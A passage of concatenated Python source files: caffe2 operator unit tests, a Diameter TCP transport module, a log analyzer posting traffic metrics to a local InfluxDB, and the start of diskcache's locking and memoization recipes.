**hu.gcs)
def test_batch_to_space(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(
n * block_size * block_size,
c,
(h + 2 * pad) // block_size,
(w + 2 * pad) // block_size).astype(np.float32)
op = core.CreateOperator("BatchToSpace", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(),
in_place=st.booleans(),
scale=st.floats(min_value=-2.0, max_value=2.0),
**hu.gcs)
def test_scale(self, X, in_place, scale, gc, dc):
op = core.CreateOperator(
"Scale", ["X"], ["Y" if not in_place else "X"],
scale=scale)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(s=st.text())
def test_string_serde(self, s):
s = s.encode('ascii', 'ignore')
self.ws.create_blob("a").feed(s)
serialized = self.ws.blobs["a"].serialize("a")
self.ws.create_blob("b").deserialize(serialized)
self.assertEqual(s, self.ws.blobs[("a")].fetch())
self.assertEqual(s, self.ws.blobs[("b")].fetch())
@given(n=st.integers(1, 3),
dim=st.integers(4, 16),
**hu.gcs)
def test_distances(self, n, dim, gc, dc):
X = np.random.uniform(-1, 1, (n, dim)).astype(np.float32)
Y = np.random.uniform(-1, 1, (n, dim)).astype(np.float32)
self.ws.create_blob("X").feed(X)
self.ws.create_blob("Y").feed(Y)
def check_grad(op):
self.assertGradientChecks(gc, op, [X, Y], 0, [0],
stepsize=1e-2, threshold=1e-2)
self.assertGradientChecks(gc, op, [X, Y], 1, [0],
stepsize=1e-2, threshold=1e-2)
l2_op = core.CreateOperator("SquaredL2Distance",
["X", "Y"], ["l2_dist"])
self.ws.run(l2_op)
np.testing.assert_allclose(self.ws.blobs[("l2_dist")].fetch(),
np.square(X - Y).sum(axis=1) * 0.5,
rtol=1e-4, atol=1e-4)
check_grad(l2_op)
if gc.device_type == 1:
# Only SquaredL2Distance has CUDA implementation
return
dot_op = core.CreateOperator("DotProduct", ["X", "Y"], ["dot"])
self.ws.run(dot_op)
np.testing.assert_allclose(self.ws.blobs[("dot")].fetch(),
np.multiply(X, Y).sum(axis=1),
rtol=1e-4, atol=1e-4)
check_grad(dot_op)
kEps = 1e-12
cos_op = core.CreateOperator("CosineSimilarity", ["X", "Y"], ["cos"])
self.ws.run(cos_op)
cos = np.divide(np.multiply(X, Y).sum(axis=1),
np.multiply(np.linalg.norm(X, axis=1) + kEps,
np.linalg.norm(Y, axis=1) + kEps))
np.testing.assert_allclose(self.ws.blobs[("cos")].fetch(), cos,
rtol=1e-4, atol=1e-4)
check_grad(cos_op)
@given(pad=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_same_pad_image(self, pad, size, input_channels, batch_size, order,
mode, gc, dc):
assume(size > pad)
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad=pad,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad, pad), (pad, pad), (0, 0)), mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(pad_t=st.integers(0, 3),
pad_l=st.integers(0, 3),
pad_b=st.integers(0, 3),
pad_r=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_pad_image(self, pad_t, pad_l, pad_b, pad_r, size, input_channels,
batch_size, order, mode, gc, dc):
assume(size > max(pad_b, pad_r, pad_t, pad_l))
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad_t=pad_t,
pad_l=pad_l,
pad_b=pad_b,
pad_r=pad_r,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad_t, pad_b), (pad_l, pad_r), (0, 0)),
mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)),
mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(size=st.integers(7, 10),
input_channels=st.integers(1, 10),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW", "NHWC"]),
epsilon=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_instance_norm(self, size, input_channels, batch_size, order,
epsilon, gc, dc):
op = core.CreateOperator(
"InstanceNorm",
["X", "scale", "bias"],
["Y"],
order=order,
epsilon=epsilon,
)
np.random.seed(1701)
scale = np.random.rand(input_channels).astype(np.float32) + 0.5
bias = np.random.rand(input_channels).astype(np.float32) - 0.5
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
if order == "NHWC":
X = X.swapaxes(1, 2).swapaxes(2, 3)
def ref_nchw(x, scale, bias):
x = x.reshape(batch_size * input_channels, size * size)
y = (x - x.mean(1)[:, np.newaxis])
y /= np.sqrt(x.var(1) + epsilon)[:, np.newaxis]
y = y.reshape(batch_size, input_channels, size, size)
y = y * scale.reshape(1, input_channels, 1, 1)
y = y + bias.reshape(1, input_channels, 1, 1)
return (y, )
def ref_nhwc(x, scale, bias):
x = x.swapaxes(2, 3).swapaxes(1, 2)
y = ref_nchw(x, scale, bias)[0]
return (y.swapaxes(1, 2).swapaxes(2, 3), )
self.assertReferenceChecks(
gc, op, [X, scale, bias],
ref_nchw if order == "NCHW" else ref_nhwc)
# TODO(jiayq): when there are backward and GPU implementations, enable
# these two.
# self.assertDeviceChecks(dc, op, [X, scale, bias], [0])
# self.assertGradientChecks(gc, op, [X, scale, bias], 0, [0])
ws = workspace.C.Workspace()
feeds = [("X", X), ("scale", scale), ("bias", bias)]
for blob, arr in feeds:
ws.create_blob(blob).feed(arr)
for _ in range(100):
ws.run(op)
for blob, arr in feeds:
np.testing.assert_array_equal(ws.blobs[blob].fetch(), arr)
@given(sizes=st.lists(st.integers(1, 100), min_size=1),
in_place=st.booleans(),
**hu.gcs)
def test_unsafe_coalesce(self, sizes, in_place, gc, dc):
gAlignment = 32
Xs = [np.random.randn(size)
.astype(np.random.choice([np.float32, np.float64, np.uint8]))
for size in sizes]
op = core.CreateOperator(
"UnsafeCoalesce",
["X_{}".format(i) for i, _ in enumerate(sizes)],
[("X_{}" if in_place else "Y_{}").format(i)
for i, _ in enumerate(sizes)] + ["coalesced"])
self.assertDeviceChecks(dc, op, Xs, list(range(len(sizes) + 1)))
def unsafe_coalesce(*xs):
def to_uint8(x):
x_aligned_bytes = ((x.nbytes + gAlignment - 1) // gAlignment) \
* gAlignment
x_aligned = np.zeros(
shape=(x_aligned_bytes // x.dtype.itemsize, ),
dtype=x.dtype)
x_aligned[:x.size] = x
x_cast = np.fromstring(x_aligned.tobytes(), dtype='<u1')
return x_cast
flat = [to_uint8(x) for x in xs]
coalesced = np.concatenate(flat)
return list(xs) + [coalesced]
self.assertReferenceChecks(gc, op, Xs, unsafe_coalesce)
@given(inp=_dtypes().flatmap(lambda dt: _tensor_and_indices(
elements=st.floats(min_value=0, max_value=1), dtype=dt)),
**hu.gcs_cpu_only)
def test_sparse_to_dense(self, inp, gc, dc):
first_dim, X, I = inp
# values don't matter
D = np.zeros((first_dim,) + X.shape[1:])
op = core.CreateOperator("SparseToDense", ["I", "X", "D"], ["Y"])
def sparse_to_dense(I, X, D):
O = np.zeros(D.shape)
for i, p in enumerate(I):
O[p] += X[i]
return [O]
self.assertReferenceChecks(gc, op, [I, X, D], sparse_to_dense)
self.assertDeviceChecks(dc, op, [I, X, D], [0])
X = X.astype(np.float32)
self.assertGradientChecks(gc, op, [I, X, D], 1, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_dot_product(self, inputs, gc, dc):
X, Y = inputs
op = core.CreateOperator("DotProduct", ["X", "Y"], 'out')
def dotproduct(X, Y):
return (np.sum(X * Y, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
K=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_padding(self, N, M, K, pad_value, gc, dc):
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
pad_value=pad_value)
def dotproduct(X, Y):
Z = np.ones((N, max(M, K))).astype(np.float32) * pad_value
if M < K:
Z[:, :M] = X
return (np.sum(Z * Y, axis=1), )
else:
Z[:, :K] = Y
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_rep_padding(self, N, M, pad_value, gc, dc):
K = 2 * M
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
replicate=True,
pad_value=pad_value)
def dotproduct(X, Y):
import numpy.matlib as npm
if M < K:
Z = npm.repmat(X, 1, K // M)
return (np.sum(Z * Y, axis=1), )
else:
Z = npm.repmat(Y, 1, M // K)
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10), **hu.gcs_cpu_only)
def test_ensure_dense(self, N, M, gc, dc):
# in place
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "X")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
# or not
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "out")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
@given(N=st.integers(min_value=10, max_value=100),
M=st.integers(min_value=2, max_value=10),
num_buckets=st.integers(min_value=1, max_value=5),
**hu.gcs_cpu_only)
def test_accumulate_histogram_op(self, N, M, num_buckets, gc, dc):
X = np.random.rand(N, M).astype(np.float32)
lower_bound, upper_bound = 0.1, 0.9
op = core.CreateOperator("AccumulateHistogram", ["X"],
['cur_hist', 'acc_hist'],
lower_bound=lower_bound,
upper_bound=upper_bound,
num_buckets=num_buckets)
def histogram(X):
hist = np.zeros((num_buckets + 2, ), dtype=np.int32)
segment = (upper_bound - lower_bound) / num_buckets
Y = np.zeros((N, M), dtype=np.int32)
Y[X < lower_bound] = 0
Y[X >= upper_bound] = num_buckets + 1
Y[(X >= lower_bound) & (X < upper_bound)] = \
((X[(X >= lower_bound) & (X < upper_bound)] - lower_bound) /
segment + 1).astype(np.int32)
for i in range(Y.shape[0]):
for j in range(Y.shape[1]):
hist[Y[i][j]] += 1
cur_hist, acc_hist = hist, hist
return [cur_hist, acc_hist]
self.assertDeviceChecks(dc, op, [X], [0, 1])
self.assertReferenceChecks(gc, op, [X], histogram)
if __name__ == "__main__":
unittest.main()
|
transport.py
|
# -*- coding: utf-8 -*-
"""
bromelia.transport
~~~~~~~~~~~~~~~~~~
This module defines the TCP transport layer connections that are used
by the Diameter application protocol underlying.
:copyright: (c) 2020-present Henrique Marques Ribeiro.
:license: MIT, see LICENSE for more details.
"""
import copy
import logging
import random
import selectors
import socket
import threading
from .config import TRACKING_SOCKET_EVENTS_TIMEOUT
tcp_connection = logging.getLogger("TcpConnection")
tcp_client = logging.getLogger("TcpClient")
tcp_server = logging.getLogger("TcpServer")
class TcpConnection():
def __init__(self, ip_address, port):
self._recv_buffer = b""
self._send_buffer = b""
self.send_data_stream_queued = False
self.data_stream = b""
self._recv_data_stream = b""
self._recv_data_available = threading.Event()
self.write_mode_on = threading.Event()
self.read_mode_on = threading.Event()
self.lock = threading.Lock()
self.recv_data_consumed = False
self.ip_address = ip_address
self.port = port
self.sock = None
self.is_connected = False
self.sock_id = "".join(random.choice('0123456789ABCDEF') for i in range(16))
tcp_connection.debug(f"Creating Socket with ID {self.sock_id}")
self._stop_threads = False
self.selector = selectors.DefaultSelector()
self.tracking_events_count = 0
self.connection_attempts = 3
self.events_mask = selectors.EVENT_READ
def is_write_mode(self):
if self.events_mask & selectors.EVENT_WRITE:
return True
return False
def is_read_mode(self):
if self.events_mask & selectors.EVENT_READ:
return True
return False
def is_read_write_mode(self):
if self.events_mask & (selectors.EVENT_READ | selectors.EVENT_WRITE):
return True
return False
def close(self):
if not self.is_connected:
raise ConnectionError("There is no transport connection up for "\
"this PeerNode")
self.is_connected = False
try:
self.selector.unregister(self.sock)
tcp_connection.debug(f"[Socket-{self.sock_id}] De-registering "\
f"Socket from Selector address: "\
f"{self.selector.get_map()}")
self.sock.close()
tcp_connection.debug(f"[Socket-{self.sock_id}] Shutting "\
f"down Socket")
except KeyError as e:
tcp_connection.debug(f"[Socket-{self.sock_id}] There is no "\
f"such Selector registered")
self._stop_threads = True
def run(self):
if not self.is_connected:
raise ConnectionError(f"[Socket-{self.sock_id}] There is no "\
f"transport connection up for this Peer")
threading.Thread(name="transport_layer_bootstrapper",
target=self._run).start()
def _run(self):
while self.is_connected and not self._stop_threads:
self.events = self.selector.select(timeout=TRACKING_SOCKET_EVENTS_TIMEOUT)
self.tracking_events_count += TRACKING_SOCKET_EVENTS_TIMEOUT
for key, mask in self.events:
if key.data is not None:
self.data_stream += key.data
if mask & selectors.EVENT_WRITE:
tcp_connection.debug(f"Selector notified EVENT_WRITE")
self.write()
if mask & selectors.EVENT_READ:
tcp_connection.debug(f"Selector notified EVENT_READ")
self.read()
def _set_selector_events_mask(self, mode, msg=None):
self.lock.acquire()
if mode == "r":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [READ]")
self.events_mask = selectors.EVENT_READ
self.selector.modify(self.sock, self.events_mask)
self.write_mode_on.clear()
self.read_mode_on.set()
elif mode == "w":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [WRITE]")
self.events_mask = selectors.EVENT_WRITE
self.selector.modify(self.sock, self.events_mask, data=msg)
self.write_mode_on.set()
self.read_mode_on.clear()
elif mode == "rw":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [READ/WRITE]")
self.events_mask = selectors.EVENT_READ | selectors.EVENT_WRITE
self.selector.modify(self.sock, self.events_mask, data=msg)
self.write_mode_on.set()
self.read_mode_on.set()
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask: Invalid entry")
self.lock.release()
def _write(self):
if self._send_buffer:
try:
sent = self.sock.send(self._send_buffer)
tcp_connection.debug(f"[Socket-{self.sock_id}] Just sent "\
f"{sent} bytes in _send_buffer")
except BlockingIOError:
tcp_connection.exception(f"[Socket-{self.sock_id}] An error "\
f"has occurred")
self._stop_threads = True
else:
self._send_buffer = self._send_buffer[sent:]
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data "\
f"has been sent")
def write(self):
if not self.send_data_stream_queued and self.data_stream:
self._send_buffer += self.data_stream
self.data_stream = b""
self.send_data_stream_queued = True
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data has "\
f"been queued into _send_buffer: "\
f"{self._send_buffer.hex()}")
self._write()
if self.send_data_stream_queued and not self._send_buffer:
self._set_selector_events_mask("r")
self.send_data_stream_queued = False
tcp_connection.debug(f"[Socket-{self.sock_id}] There is no "\
f"data to be sent for a while")
def _read(self):
try:
data = self.sock.recv(4096*64)
tcp_connection.debug(f"[Socket-{self.sock_id}] Data received: "\
f"{data.hex()}")
except:
tcp_connection.exception(f"[Socket-{self.sock_id}] An Exception "\
f"has been raised")
self.error_has_raised = True
self._stop_threads = True
else:
if data:
self._recv_buffer += data
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer: "\
f"{self._recv_buffer.hex()}")
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Peer closed "\
f"connection")
self._stop_threads = True
def read(self):
self._read()
if self._recv_buffer:
self._recv_data_stream += copy.copy(self._recv_buffer)
self._recv_data_available.set()
self._recv_buffer = b""
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer has "\
f"been cleaned up")
self._set_selector_events_mask("r")
def test_connection(self):
while True:
try:
self.sock.send(b"")
return True
except OSError as e:
if e.args[0] == 10057:
self.connection_attempts -= self.connection_attempts
return False
class TcpClient(TcpConnection):
def __init__(self, ip_address, port):
super().__init__(ip_address, port)
def start(self):
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client.debug(f"[Socket-{self.sock_id}] Client-side Socket: "\
f"{self.sock}")
self.sock.setblocking(False)
tcp_client.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.sock.connect_ex((self.ip_address, self.port))
tcp_client.debug(f"[Socket-{self.sock_id}] Connecting to the "\
f"Remote Peer")
self.is_connected = True
self.selector.register(self.sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_client.debug(f"[Socket-{self.sock_id}] Registering Socket "\
f"Selector address: {self.selector.get_map()}")
except Exception as e:
tcp_client.exception(f"client_errors: {e.args}")
class TcpServer(TcpConnection):
def __init__(self, ip_address, port):
super().__init__(ip_address, port)
def start(self):
try:
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_connection.debug(f"[Socket-{self.sock_id}] Server-side "\
f"Socket: {self.server_sock}")
self.server_selector = selectors.DefaultSelector()
self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 4096*64)
self.server_sock.bind((self.ip_address, self.port))
self.server_sock.listen()
tcp_server.debug(f"[Socket-{self.sock_id}] Listening on "\
f"{self.ip_address}:{self.port}")
self.server_sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.server_selector.register(self.server_sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"Socket into Selector address: "\
f"{self.server_selector.get_map()}")
except Exception as e:
tcp_server.exception(f"server_error: {e.args}")
def run(self):
events = self.server_selector.select(timeout=None)
for key, mask in events:
tcp_server.debug(f"[Socket-{self.sock_id}] Event has been "\
f"raised on Main Socket: (mask, key) = "\
f"({mask}, {key})")
if key.data is None:
self.sock, self.remote_address = self.server_sock.accept()
self.sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] New Socket "\
f"bound to Main Socket: {self.sock}")
self.is_connected = True
self.selector.register(self.sock, selectors.EVENT_READ)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"New Socket into Selector address: "\
f"{self.selector.get_map()}")
super().run()
def close(self):
super().close()
try:
self.server_selector.unregister(self.server_sock)
tcp_server.debug(f"De-registering Main Socket from Selector "\
f"address: {self.server_selector.get_map()}")
self.server_sock.close()
tcp_server.debug("Shutting down Main Socket")
except KeyError:
tcp_server.debug("There is no such Selector registered")
|
analyzer_threading.py
|
import os
import re
import sys
import queue
import datetime
import threading
import requests
compile = re.compile(r'(?P<ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}) .* .* \[(?P<time>.*)\] "(?P<method>\w+) (?P<url>[^\s]*) (?P<version>[\w|/\.\d]*)" (?P<status>\d{3}) (?P<length>\d+) "(?P<referer>[^\s]*)" "(?P<ua>.*)"')
event = threading.Event()
def read_log(q, path):
offset = 0
while not event.is_set():
with open(path) as f:
if offset > os.stat(path).st_size:
offset = 0
f.seek(offset)
for line in f:
q.put(line)
offset = f.tell()
event.wait(0.1)
def read_worker(q, path):
t = threading.Thread(target=read_log, name='read-{}'.format(path), args=(q, path), daemon=True)
t.start()
def parse(q):
while not event.is_set():
line = q.get()
search = compile.search(line.rstrip('\n'))
if search:
data = search.groupdict()
yield data
def agg(q, interval=10):
count = 0
traffic = 0
error = 0
start = datetime.datetime.now()
for item in parse(q):
print(item)
count += 1
traffic += int(item['length'])
if int(item['status']) >= 300:
error += 1
current = datetime.datetime.now()
if (current - start).total_seconds() >= interval:
error_rate = error / count
send(count, traffic, error_rate)
start = current
count = 0
traffic = 0
error = 0
def send(count, traffic, error_rate):
line = 'access_log count={},traffic={},error_rate={}'.format(count, traffic, error_rate)
res = requests.post('http://127.0.0.1:8086/write', data=line, params={'db': 'magedu'})
if res.status_code >= 300:
print(res.content)
def manager(*paths):
q = queue.Queue()
for path in paths:
read_worker(q, path)
agg(q, 10)
if __name__ == '__main__':
manager(*sys.argv[1:])
|
recipes.py
|
"""Disk Cache Recipes
"""
import functools
import math
import os
import random
import threading
import time
from .core import ENOVAL, args_to_key, full_name
class Averager(object):
"""Recipe for calculating a running average.
Sometimes known as "online statistics," the running average maintains the
total and count. The average can then be calculated at any time.
>>> import diskcache
>>> cache = diskcache.FanoutCache()
>>> ave = Averager(cache, 'latency')
>>> ave.add(0.080)
>>> ave.add(0.120)
>>> ave.get()
0.1
>>> ave.add(0.160)
>>> ave.pop()
0.12
>>> print(ave.get())
None
"""
def __init__(self, cache, key, expire=None, tag=None):
self._cache = cache
self._key = key
self._expire = expire
self._tag = tag
def add(self, value):
"Add `value` to average."
with self._cache.transact(retry=True):
total, count = self._cache.get(self._key, default=(0.0, 0))
total += value
count += 1
self._cache.set(
self._key, (total, count), expire=self._expire, tag=self._tag,
)
def get(self):
"Get current average or return `None` if count equals zero."
total, count = self._cache.get(self._key, default=(0.0, 0), retry=True)
return None if count == 0 else total / count
def pop(self):
"Return current average and delete key."
total, count = self._cache.pop(self._key, default=(0.0, 0), retry=True)
return None if count == 0 else total / count
class Lock(object):
"""Recipe for cross-process and cross-thread lock.
>>> import diskcache
>>> cache = diskcache.Cache()
>>> lock = Lock(cache, 'report-123')
>>> lock.acquire()
>>> lock.release()
>>> with lock:
... pass
"""
def __init__(self, cache, key, expire=None, tag=None):
self._cache = cache
self._key = key
self._expire = expire
self._tag = tag
def acquire(self):
"Acquire lock using spin-lock algorithm."
while True:
added = self._cache.add(
self._key,
None,
expire=self._expire,
tag=self._tag,
retry=True,
)
if added:
break
time.sleep(0.001)
def release(self):
"Release lock by deleting key."
self._cache.delete(self._key, retry=True)
def locked(self):
"Return true if the lock is acquired."
return self._key in self._cache
def __enter__(self):
self.acquire()
def __exit__(self, *exc_info):
self.release()
class RLock(object):
"""Recipe for cross-process and cross-thread re-entrant lock.
>>> import diskcache
>>> cache = diskcache.Cache()
>>> rlock = RLock(cache, 'user-123')
>>> rlock.acquire()
>>> rlock.acquire()
>>> rlock.release()
>>> with rlock:
... pass
>>> rlock.release()
>>> rlock.release()
Traceback (most recent call last):
...
AssertionError: cannot release un-acquired lock
"""
def __init__(self, cache, key, expire=None, tag=None):
self._cache = cache
self._key = key
self._expire = expire
self._tag = tag
def acquire(self):
"Acquire lock by incrementing count using spin-lock algorithm."
pid = os.getpid()
tid = threading.get_ident()
pid_tid = '{}-{}'.format(pid, tid)
while True:
with self._cache.transact(retry=True):
value, count = self._cache.get(self._key, default=(None, 0))
if pid_tid == value or count == 0:
self._cache.set(
self._key, (pid_tid, count + 1),
expire=self._expire, tag=self._tag,
)
return
time.sleep(0.001)
def release(self):
"Release lock by decrementing count."
pid = os.getpid()
tid = threading.get_ident()
pid_tid = '{}-{}'.format(pid, tid)
with self._cache.transact(retry=True):
value, count = self._cache.get(self._key, default=(None, 0))
is_owned = pid_tid == value and count > 0
assert is_owned, 'cannot release un-acquired lock'
self._cache.set(
self._key, (value, count - 1),
expire=self._expire, tag=self._tag,
)
def __enter__(self):
self.acquire()
def __exit__(self, *exc_info):
self.release()
class BoundedSemaphore(object):
"""Recipe for cross-process and cross-thread bounded semaphore.
>>> import diskcache
>>> cache = diskcache.Cache()
>>> semaphore = BoundedSemaphore(cache, 'max-cons', value=2)
>>> semaphore.acquire()
>>> semaphore.acquire()
>>> semaphore.release()
>>> with semaphore:
... pass
>>> semaphore.release()
>>> semaphore.release()
Traceback (most recent call last):
...
AssertionError: cannot release un-acquired semaphore
"""
def __init__(self, cache, key, value=1, expire=None, tag=None):
self._cache = cache
self._key = key
self._value = value
self._expire = expire
self._tag = tag
def acquire(self):
"Acquire semaphore by decrementing value using spin-lock algorithm."
while True:
with self._cache.transact(retry=True):
value = self._cache.get(self._key, default=self._value)
if value > 0:
self._cache.set(
self._key, value - 1,
expire=self._expire, tag=self._tag,
)
return
time.sleep(0.001)
def release(self):
"Release semaphore by incrementing value."
with self._cache.transact(retry=True):
value = self._cache.get(self._key, default=self._value)
assert self._value > value, 'cannot release un-acquired semaphore'
value += 1
self._cache.set(
self._key, value, expire=self._expire, tag=self._tag,
)
def __enter__(self):
self.acquire()
def __exit__(self, *exc_info):
self.release()
def throttle(cache, count, seconds, name=None, expire=None, tag=None,
time_func=time.time, sleep_func=time.sleep):
"""Decorator to throttle calls to function.
>>> import diskcache, time
>>> cache = diskcache.Cache()
>>> count = 0
>>> @throttle(cache, 2, 1) # 2 calls per 1 second
... def increment():
... global count
... count += 1
>>> start = time.time()
>>> while (time.time() - start) <= 2:
... increment()
>>> count in (6, 7) # 6 or 7 calls depending on CPU load
True
"""
def decorator(func):
rate = count / float(seconds)
key = full_name(func) if name is None else name
now = time_func()
cache.set(key, (now, count), expire=expire, tag=tag, retry=True)
@functools.wraps(func)
def wrapper(*args, **kwargs):
while True:
with cache.transact(retry=True):
last, tally = cache.get(key)
now = time_func()
tally += (now - last) * rate
delay = 0
if tally > count:
cache.set(key, (now, count - 1), expire)
elif tally >= 1:
cache.set(key, (now, tally - 1), expire)
else:
delay = (1 - tally) / rate
if delay:
sleep_func(delay)
else:
break
return func(*args, **kwargs)
return wrapper
return decorator
def barrier(cache, lock_factory, name=None, expire=None, tag=None):
"""Barrier to calling decorated function.
Supports different kinds of locks: Lock, RLock, BoundedSemaphore.
>>> import diskcache, time
>>> cache = diskcache.Cache()
>>> @barrier(cache, Lock)
... def work(num):
... print('worker started')
... time.sleep(1)
... print('worker finished')
>>> import multiprocessing.pool
>>> pool = multiprocessing.pool.ThreadPool(2)
>>> _ = pool.map(work, range(2))
worker started
worker finished
worker started
worker finished
>>> pool.terminate()
"""
def decorator(func):
key = full_name(func) if name is None else name
lock = lock_factory(cache, key, expire=expire, tag=tag)
@functools.wraps(func)
def wrapper(*args, **kwargs):
with lock:
return func(*args, **kwargs)
return wrapper
return decorator
def memoize_stampede(cache, expire, name=None, typed=False, tag=None, beta=1):
"""Memoizing cache decorator with cache stampede protection.
Cache stampedes are a type of system overload that can occur when parallel
computing systems using memoization come under heavy load. This behaviour
is sometimes also called dog-piling, cache miss storm, cache choking, or
the thundering herd problem.
The memoization decorator implements cache stampede protection through
early recomputation. Early recomputation of function results will occur
probabilistically before expiration in a background thread of
execution. Early probabilistic recomputation is based on research by
Vattani, A.; Chierichetti, F.; Lowenstein, K. (2015), Optimal Probabilistic
Cache Stampede Prevention, VLDB, pp. 886-897, ISSN 2150-8097
If name is set to None (default), the callable name will be determined
automatically.
If typed is set to True, function arguments of different types will be
cached separately. For example, f(3) and f(3.0) will be treated as distinct
calls with distinct results.
The original underlying function is accessible through the `__wrapped__`
attribute. This is useful for introspection, for bypassing the cache, or
for rewrapping the function with a different cache.
>>> from diskcache import Cache
>>> cache = Cache()
>>> @memoize_stampede(cache, expire=1)
... def fib(number):
... if number == 0:
... return 0
... elif number == 1:
... return 1
... else:
... return fib(number - 1) + fib(number - 2)
>>> print(fib(100))
354224848179261915075
An additional `__cache_key__` attribute can be used to generate the cache
key used for the given arguments.
>>> key = fib.__cache_key__(100)
>>> del cache[key]
Remember to call memoize when decorating a callable. If you forget, then a
TypeError will occur.
:param cache: cache to store callable arguments and return values
:param float expire: seconds until arguments expire
:param str name: name given for callable (default None, automatic)
:param bool typed: cache different types separately (default False)
:param str tag: text to associate with arguments (default None)
:return: callable decorator
"""
# Caution: Nearly identical code exists in Cache.memoize
def decorator(func):
"Decorator created by memoize call for callable."
base = (full_name(func),) if name is None else (name,)
def timer(*args, **kwargs):
"Time execution of `func` and return result and time delta."
start = time.time()
result = func(*args, **kwargs)
delta = time.time() - start
return result, delta
@functools.wraps(func)
def wrapper(*args, **kwargs):
